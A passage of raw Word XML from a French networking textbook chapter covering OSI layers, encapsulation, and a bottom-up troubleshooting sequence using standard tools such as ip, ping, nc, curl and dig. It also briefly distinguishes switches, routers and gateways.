            <w:tcW w:type="dxa" w:w="305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Exemples</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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Unité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>7 Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Application</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HTTP, DNS, SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Données</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>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6 Présentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="208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Application</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TLS, encodage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Données</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>5 Session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Application</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Sessions, cookies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Données</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>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4 Transport</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="208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Transport</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TCP, UDP, QUIC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Segment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>3 Réseau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Internet</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IP, ICMP, routage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Paquet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>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2 Liaison</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="208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Accès réseau</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Ethernet, Wi-Fi, ARP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Trame</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>1 Physique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Accès réseau</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Câble, fibre, ondes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Bit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3429000"/>
            <wp:docPr id="64" name="Picture 64"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f62.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId96"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3429000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.62 — Le trajet d'une requête HTTPS</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ENCAPSULATION</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Chaque couche ajoute son en-tête aux données de la couche supérieure. À la réception, les en-têtes sont retirés dans l'ordre inverse.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>54.2 Ce que chaque couche garantit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une panne réseau se diagnostique en partant du bas : si la couche 3 échoue, inutile de vérifier la couche 7. Cette progression évite les fausses pistes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.187 — Cinq couches et leurs outils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192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Couche</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="413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Question</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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Outil</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1921"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>1–2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4138"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Le lien est-il actif ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2955"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ip link</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ethtool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="192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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="413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La destination est-elle joignable ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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ping</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>traceroute</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1921"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4138"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Le routage est-il correct ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2955"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ip route</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="192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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="413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Le port est-il ouvert ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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nc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ss</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1921"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4138"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Le service répond-il ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2955"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>curl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dig</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Sept vérifications ordonnées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Descendre la pile, dans l'ordre</w:t>
        <w:br/>
        <w:t>ip link show                    # la carte est-elle UP ?</w:t>
        <w:br/>
        <w:t>ip addr show                    # une adresse est-elle configurée ?</w:t>
        <w:br/>
        <w:t>ip route                        # existe-t-il une route par défaut ?</w:t>
        <w:br/>
        <w:t>ping -c 3 1.1.1.1               # la couche 3 répond-elle ?</w:t>
        <w:br/>
        <w:t>ping -c 3 exemple.fr            # la résolution DNS fonctionne-t-elle ?</w:t>
        <w:br/>
        <w:t>nc -zv exemple.fr 443           # le port est-il ouvert ?</w:t>
        <w:br/>
        <w:t>curl -I https://exemple.fr      # l'application répond-elle ?</w:t>
      </w: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LE DIAGNOSTIC EN TROIS QUESTIONS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>« Est-ce que ça marche ailleurs ? » sépare un problème local d'un problème global. « Depuis quand ? » oriente vers un changement. « Qu'est-ce qui a changé ? » trouve la cause dans la majorité des cas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>54.3 Commutateurs, routeurs, passerelles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un commutateur relie des machines d'un même réseau local ; un routeur relie des réseaux différents. Une passerelle est le routeur par lequel sortent les paquets destinés à l'extérieur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2730500"/>
            <wp:docPr id="65" name="Picture 65"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f63.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId97"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2730500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
